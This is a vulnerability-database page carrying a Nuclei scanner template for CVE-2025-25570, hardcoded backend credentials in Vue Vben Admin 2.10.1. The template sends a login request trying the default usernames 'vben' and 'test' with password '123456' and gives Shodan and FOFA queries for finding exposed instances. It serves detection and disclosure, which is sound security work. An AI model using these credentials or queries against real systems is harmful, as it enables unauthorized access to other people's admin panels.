Lucene search
+L

Vue Vben Admin - Default Credentials

🗓️ 01 Aug 2026 10:03:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 78 Views

Vue Vben Admin 2.10.1 has hardcoded backend credentials enabling unauthorized login.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2025-25570
28 Feb 202501:08
circl
cnnvd
CNNVD
Vben-Admin 安全漏洞
27 Feb 202500:00
cnnvd
cve
CVE
CVE-2025-25570
27 Feb 202500:00
cve
cvelist
Cvelist
CVE-2025-25570
27 Feb 202500:00
cvelist
euvd
EUVD
EUVD-2025-5494
3 Oct 202520:07
euvd
nvd
NVD
CVE-2025-25570
27 Feb 202522:15
nvd
ptsecurity
Positive Technologies
PT-2025-9029
27 Feb 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2025-25570
1 Mar 202500:26
redhatcve
thn
The Hacker News
⚡ THN Weekly Recap: Alerts on Zero-Day Exploits, AI Breaches, and Crypto Heists
3 Mar 202511:58
thn
vulnrichment
Vulnrichment
CVE-2025-25570
27 Feb 202500:00
vulnrichment
Rows per page
id: CVE-2025-25570

info:
  name: Vue Vben Admin - Default Credentials
  author: 0x_Akoko
  severity: critical
  description: |
    Vue Vben Admin 2.10.1 contains a broken authentication caused by hardcoded credentials in the backend, letting attackers log in without proper authorization, exploit requires access to the login interface.
  impact: |
    Attackers can gain unauthorized access to the backend, potentially leading to data theft or system control
  remediation: |
    Remove hardcoded credentials and implement proper authentication mechanisms, update to the latest version if available.
  reference:
    - https://github.com/vbenjs/vue-vben-admin
    - https://doc.vvbin.cn/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-25570
    epss-score: 0.02021
    epss-percentile: 0.79011
    cwe-id: CWE-798
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"vben" || http.html:"vue-vben-admin"
    fofa-query: body="vben" || body="vue-vben-admin"
  tags: cve,cve2025,vben,vue,default-login,credentials

http:
  - raw:
      - |
        POST {{BaseURL}}/basic-api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    attack: clusterbomb
    payloads:
      username:
        - "vben"
        - "test"
      password:
        - "123456"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"code\":0", "\"type\":\"success\"", "\"result\":", "\"token\":")'
          - 'contains_any(body, "Vben Admin", "Super Admin")'
        condition: and
# digest: 4b0a0048304602210081a50c3443fa9aa1ee4f22081474cf8730bf179d1b76d7c38eacae84be0f5e400221008166e348aa5c34c34b7f1df2c0cb7a19e6bff883106015faa0339213eb4aeca8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8High risk
Vulners AI Score8
CVSS 3.19.8
EPSS0.02021
SSVC
78